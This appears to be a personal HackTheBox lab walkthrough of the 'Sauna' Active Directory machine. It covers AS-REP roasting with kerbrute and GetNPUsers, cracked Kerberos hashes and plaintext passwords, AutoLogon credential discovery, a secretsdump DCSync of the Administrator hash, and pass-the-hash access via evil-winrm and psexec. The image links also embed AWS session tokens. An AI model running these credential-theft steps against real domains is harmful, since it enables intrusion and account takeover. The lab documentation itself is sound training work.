HackTheBox · Lab
Sauna

Sauna

EasyWindowsActive DirectoryKerberos

Sauna.pdf

notes

Startoff with nmap

basic


```shell
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown
```


scan on spec ports


```shell
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-27 14:12:42Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-27T14:12:45
|_  start_date: N/A
|_clock-skew: 7h00m00s
```

HTTP p80

![Screenshot_2025-07-27_at_9.24.19_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/765900b2-381a-4af5-89fe-0ff1c5a93c93/Screenshot_2025-07-27_at_9.24.19_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4664XFBCXJZ%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082901Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDwM6uLK8dRLKqkuHVjt2JsdIoReIMW7klHKnZ97PE%2BrwIgfzLoo97T9B%2BLCqkzX4ft5wt0Yhrdv%2BoXYhP9nafmZnIq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDDmUn2m4OnaYTw5yaircAx%2FxI59zjXKY7eMXFTvvADFLghW%2B5kvK%2FFBWFW1I%2B33gR%2BrLbKkuxFQyQb91NGmjsuTEM%2BZNse9UOIGKEbJS6%2FStqTbXAjBtVOq%2FkxR52gM1nRH8RKgK%2FvoL20hBXKSNd6VW%2BVcqyE23Od1I%2FEJC0M4eZmbpJaJvcD0RSlKE8m%2F5seCn3g%2FG%2BHlLGsVydVyVv5G9uIj4ShSCbYI9u%2FS8zCIiaBQRMtHkL9eHdvKe6DfC0HkfYSFfhul28y5TB2uN1BIfnM4AEWcuLwva97p5jNzigRBN2b%2FUcMC52%2BPiK%2BcwMf8eIn0dUqr3U9%2BepXffGDAamlXox8J5AKWcOyt40T5wF7PKF4Pa0viTJbXuUME1cfY%2F81VUjhXkiafmlxACCVNsLOX3z9N%2BGp59A%2F3%2BKI5SdET%2BJ2Vxr2KO1cD2xmSqRbqZBGc3g3YIBlQSm7Jgdu5UZC%2BNu6hvHzzjt57PnF2norkRGL4OVerrnKHQbw5NmlqcwCv3ONfm6VlJnHl7upwpxLVfzGcq8kiD%2BN1beAfznHMkn4s3p03ya50EFnBqG8S2IBvc4JyXM7QkdPyxGlb9jOrgeZag2b%2BzdEqM1L5iaLCmIVITjDtyt3kShBRM5qWzNd3fgSjXolDbMO%2Fzuc0GOqUBjnoysYCGAS7ozwTpa34ogXijMfdsfD4AWPW2ly82UHwQb3PgWBLFR%2Bd67BbukkxNxlHe%2BuT%2F5FBGhK2vWqz7qfF%2Fsjb0JcCQYFadYIxVWEdbpyo0%2FQbs0oJTe6kuqRUTYRq2yZL5iibEfA1hkY8W3H86V%2FlZdIRugkj7iwCrUAzatDTkQGf7WqieGS%2FeXUGyjwh8dK7ZnEkKRHaJ6yoWY3nV7ReA&X-Amz-Signature=0efd68b30d6eac7287779265be2cf0e46bf37462adbc3c656a0014de2cf0f830&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Possible users?


![Screenshot_2025-07-27_at_9.26.13_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/f25a4365-056e-497a-87a8-323dcc8647aa/Screenshot_2025-07-27_at_9.26.13_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4664XFBCXJZ%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082901Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIQDwM6uLK8dRLKqkuHVjt2JsdIoReIMW7klHKnZ97PE%2BrwIgfzLoo97T9B%2BLCqkzX4ft5wt0Yhrdv%2BoXYhP9nafmZnIq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDDmUn2m4OnaYTw5yaircAx%2FxI59zjXKY7eMXFTvvADFLghW%2B5kvK%2FFBWFW1I%2B33gR%2BrLbKkuxFQyQb91NGmjsuTEM%2BZNse9UOIGKEbJS6%2FStqTbXAjBtVOq%2FkxR52gM1nRH8RKgK%2FvoL20hBXKSNd6VW%2BVcqyE23Od1I%2FEJC0M4eZmbpJaJvcD0RSlKE8m%2F5seCn3g%2FG%2BHlLGsVydVyVv5G9uIj4ShSCbYI9u%2FS8zCIiaBQRMtHkL9eHdvKe6DfC0HkfYSFfhul28y5TB2uN1BIfnM4AEWcuLwva97p5jNzigRBN2b%2FUcMC52%2BPiK%2BcwMf8eIn0dUqr3U9%2BepXffGDAamlXox8J5AKWcOyt40T5wF7PKF4Pa0viTJbXuUME1cfY%2F81VUjhXkiafmlxACCVNsLOX3z9N%2BGp59A%2F3%2BKI5SdET%2BJ2Vxr2KO1cD2xmSqRbqZBGc3g3YIBlQSm7Jgdu5UZC%2BNu6hvHzzjt57PnF2norkRGL4OVerrnKHQbw5NmlqcwCv3ONfm6VlJnHl7upwpxLVfzGcq8kiD%2BN1beAfznHMkn4s3p03ya50EFnBqG8S2IBvc4JyXM7QkdPyxGlb9jOrgeZag2b%2BzdEqM1L5iaLCmIVITjDtyt3kShBRM5qWzNd3fgSjXolDbMO%2Fzuc0GOqUBjnoysYCGAS7ozwTpa34ogXijMfdsfD4AWPW2ly82UHwQb3PgWBLFR%2Bd67BbukkxNxlHe%2BuT%2F5FBGhK2vWqz7qfF%2Fsjb0JcCQYFadYIxVWEdbpyo0%2FQbs0oJTe6kuqRUTYRq2yZL5iibEfA1hkY8W3H86V%2FlZdIRugkj7iwCrUAzatDTkQGf7WqieGS%2FeXUGyjwh8dK7ZnEkKRHaJ6yoWY3nV7ReA&X-Amz-Signature=8b0db564c4414de630c24bc1d26edfd6c2627a04d688abd50688d717791155c4&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

SMB Anonymous Auth success

Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)

Guest access null

Anon/guest share enum null

LDAP Anonymous auth success

windapsearch


```shell
❯ py /root/offsec/tools/windapsearch/windapsearch.py -d $DOMAIN --dc-ip $IP -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users

[*] Bye!
```

RPC Anon Auth null

We collected users from webpage and used usernames-generator.py

Used kerbrute with generated list and got hash from Fsmith due to no pre auth on account. It is encryption $18.

$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:274c882102df475650885d34e854453d$04cfd3ca758d056eae2098ad4fd96c375f60edc7e46ca226428b38c21264a47871cb5468880b1125a242333c66a49c7848b59cfb1f1fb3d0ad057f4283918148fdac531fb4a12435cd6584b2110ad8efd452eebe75bf4e62c1a2df19a87dcb39952a93a514820a805bbfae6b7036a785c18d5c2ca6053020e645e33582efd9659261d2749f35ccc0183bf93d29a83d0e6c7f97fde4eb4bb123fc1073b3b3108b2f274a73a145ca7f3275fb8cb5c1c27bcb272a5aa5d3764c56c244853f1f1f6b191664fc2ee91df460fd1be178b9053a63c33dc2eaa45a5b32b83b929c89b055bb1fa0c7f1a600b7c0190975e7ac86129b1bc34bcf0595af4be6bf01ae2aa6ec2a9e0988f1efb1c1f91a701adba50c919f9a2c9b3895

After running GetNPUsers.py we got Fsmith $23 TGT

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67a11e6a2abbed3aa5c07d94d84f71e$f0c81c4b62bec0393e3146838b18e7b3a28385eaef52ccc3aa47bd91e7d54fbc15313195e50b0d8537e2fbcdd4c182a8e340570b4b6129201a14495f371fb67e57e24a505bdef08632446a243596ee8a7d932a025107eaaae658c4d15965c8bf94f0afc15da92ff5bcdb5edf1258d973ba18f989379cbabf104ea7bec73832d72fa330b88c838c6b95e6c0bf55ac1472ef8522a90b3b2ad9b385cf96976e6bd8f5592aa0d02b1b954c13088541df86dbd2d8071024f2aab5feb65d4a23620d38218a6183d8be2138a105557d10bb327664017cc21e918c97db7796e0e07d109a0b6677607c418bd7672d6a1d0cdb1e889f9387024764d84a6b30d59f20b4e23d

TGT Cracked with hashcat

$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:e67...SNIP...3d:Thestrokes23

Authorizing as fsmith from here on

SMB user enum

```shell
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr
```


shares enum


```shell
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
print$          READ            Printer Drivers
RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SYSVOL          READ            Logon server share
```


Write perm on RICOH..


    dir don’t exist


smb rid brute & awk for `SidTypeUser`


```shell
Administrator
Guest
krbtgt
SAUNA$
HSmith
FSmith
svc_loanmgr
```

No TGT pre auth for the rest of users

WinRM

```shell
❯ nxc winrm $IP -u $USER -p $PASS
[+] EGOTISTICAL-BANK.LOCAL\FSmith:Thestrokes23 (Pwn3d!)
```


```shell
❯ evil-winrm -i $IP -u $USER -p $PASS
*Evil-WinRM* PS C:\Users\FSmith\Documents>
```

PRIVESC

Uplaoded `winPEASx64.exe to target.

```shell
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

Bloodhound

![Screenshot_2025-07-27_at_11.22.53_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/39aafe7a-1717-4a20-b427-589cb8ad95e5/Screenshot_2025-07-27_at_11.22.53_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466XJTAGKU2%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082902Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIF67srYwKeLIDhx5QaTA1K3I4u%2FFHszN15QC4qDkKv1TAiEAmZOQTuQ23M%2Bk60DlgQ7bDP8sw2X%2F21xwgcJG4akSUTMq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDEcTrzmPeXgl0BJYBSrcAwqPYM6g%2FDJ5PyifEz%2BaqeKIPFfA2K6Su231we9jW72wc2cHAnfV7ahB1yKOGtBkAc6JN3nD%2BcQ7q%2B%2BdKPmeuCxW67Nux3Pj7ZjeOyZcrTYsEUrTy%2Bw9jHdW6%2Ba4gzTubfQBtchiGY%2Bxid16L7nQTfzhVQFNZImdv3WGZLsbKAdXUkEK0K2aMX0lwoUrmHGrZ%2FPHgNUc7Ifpp%2B2MWf6azg0oTXpVg0CzUI%2F06sGdaRrCa%2BehEkB2S4s0hLvQ632SUP2j8PvSnPSe1oU3IZBzG78q9xjIxnCGwidg9uujI5fj9ab95A78iSPa2TGkyWcUpjovDOqt4ekknKN4Gcg3sO69uD%2FmoIhBSkgG%2BmYNHq%2FXqfP8fuhPwzGfa%2BoTM5rIXheNGvwklk2%2Bu5cEJUsOFAkqNC6irbfxZdr3huk47ANEUGhN9LPsGZW7B%2FFmKpbLmrPFzdlcYmt68apODa2yLWxnryRwrhNvvkbaJC6fs6KFu20ME%2Fnb7hALOP9CqDu9PDLcj3GhBFHjzt6%2F9wanjyXKiudYYcPrdaAUYmMyumgHIc3Rzh7PuLlighkdWKkEp6om%2FH1bHK7%2FukNODj5FBY6mu1TqRR%2FIvWxgq7ytFfb%2BCzWbEm24brCU6TWPMPfzuc0GOqUBuyGWXbNON%2B%2BzRkcjvy9uJ6ciJH11sAX%2BkqoTpr64WRXS7oc5ZCPSJ9fkMLa8T46ORgwSSb5jzd910vHHRxKMAIwn8vtqWTgH12dLvPxmv48q7uMXlaLt%2BFZxgIrirJNN%2B9Nttng9UFSBFlbAzC57TaTkf6m8VMxLdk2recRhuLlnPmkG2TxyCbSJS8H5f6ddE7bGMJjfHqS5mXDjbfHIEJfpQNtd&X-Amz-Signature=fe431e311262a56b79aebbd06f2846514a055ee117d93929f58d13547749515f&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


![Screenshot_2025-07-27_at_11.23.24_AM.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/605cdd4d-b2d1-48f2-9be6-8916b5f383d9/Screenshot_2025-07-27_at_11.23.24_AM.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466XJTAGKU2%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082902Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIF67srYwKeLIDhx5QaTA1K3I4u%2FFHszN15QC4qDkKv1TAiEAmZOQTuQ23M%2Bk60DlgQ7bDP8sw2X%2F21xwgcJG4akSUTMq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDEcTrzmPeXgl0BJYBSrcAwqPYM6g%2FDJ5PyifEz%2BaqeKIPFfA2K6Su231we9jW72wc2cHAnfV7ahB1yKOGtBkAc6JN3nD%2BcQ7q%2B%2BdKPmeuCxW67Nux3Pj7ZjeOyZcrTYsEUrTy%2Bw9jHdW6%2Ba4gzTubfQBtchiGY%2Bxid16L7nQTfzhVQFNZImdv3WGZLsbKAdXUkEK0K2aMX0lwoUrmHGrZ%2FPHgNUc7Ifpp%2B2MWf6azg0oTXpVg0CzUI%2F06sGdaRrCa%2BehEkB2S4s0hLvQ632SUP2j8PvSnPSe1oU3IZBzG78q9xjIxnCGwidg9uujI5fj9ab95A78iSPa2TGkyWcUpjovDOqt4ekknKN4Gcg3sO69uD%2FmoIhBSkgG%2BmYNHq%2FXqfP8fuhPwzGfa%2BoTM5rIXheNGvwklk2%2Bu5cEJUsOFAkqNC6irbfxZdr3huk47ANEUGhN9LPsGZW7B%2FFmKpbLmrPFzdlcYmt68apODa2yLWxnryRwrhNvvkbaJC6fs6KFu20ME%2Fnb7hALOP9CqDu9PDLcj3GhBFHjzt6%2F9wanjyXKiudYYcPrdaAUYmMyumgHIc3Rzh7PuLlighkdWKkEp6om%2FH1bHK7%2FukNODj5FBY6mu1TqRR%2FIvWxgq7ytFfb%2BCzWbEm24brCU6TWPMPfzuc0GOqUBuyGWXbNON%2B%2BzRkcjvy9uJ6ciJH11sAX%2BkqoTpr64WRXS7oc5ZCPSJ9fkMLa8T46ORgwSSb5jzd910vHHRxKMAIwn8vtqWTgH12dLvPxmv48q7uMXlaLt%2BFZxgIrirJNN%2B9Nttng9UFSBFlbAzC57TaTkf6m8VMxLdk2recRhuLlnPmkG2TxyCbSJS8H5f6ddE7bGMJjfHqS5mXDjbfHIEJfpQNtd&X-Amz-Signature=be57940e36b15ccf67314c91c4f37cd82c73f0278c8916418234435c6c5e55fd&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


Lets use secretdump


```shell
❯ secretsdump.py $DOMAIN/$USER:$PASS@$IP -just-dc-user Administrator

...SNIP...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
```

We have Administrator HASH

Let’s pass the hash


```shell
❯ evil-winrm -i $IP -u $USER -H $HASH
                                        
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
```

Let’s use psexec also

❯ psexec.py $DOMAIN/$USER@$IP -hashes $HASH

C:\Windows\system32> whoami
nt authority\system

image.png

Ippsec Notes

Kerbrute is good for brute forcing due to no event code 4624, it creates a kerberos failure, which by default is not logged.

If

nxc smb $IP -u admin -H $NTLM

comes with (Pwn3d!) we can get NT AUTH with psexec

Scope

10.10.10.175

OS

Windows 10 / Server 2019 Build 17763 x64

FQDN / DOMAIN

SAUNA.EGOTISTICAL-BANK.LOCAL

Web Technology

Windows Server IIS 10.0
html / javascript

Users

# Valid users
Administrator
krbtgt
hsmith
fsmith
svc_loanmgr

# Web page users
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Sophie Driver
Steven Kerb
Jenny Joy

Credentials

fsmith:Thestrokes23
svc_loanmanager:Moneymakestheworldgoround!

NMAP

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown

sauna.nmapscan.txt

Other Notes

Privilege Escalation

Takeaway Concepts

Logs

full_smb_spidering_2025-07-27_09-59-25.log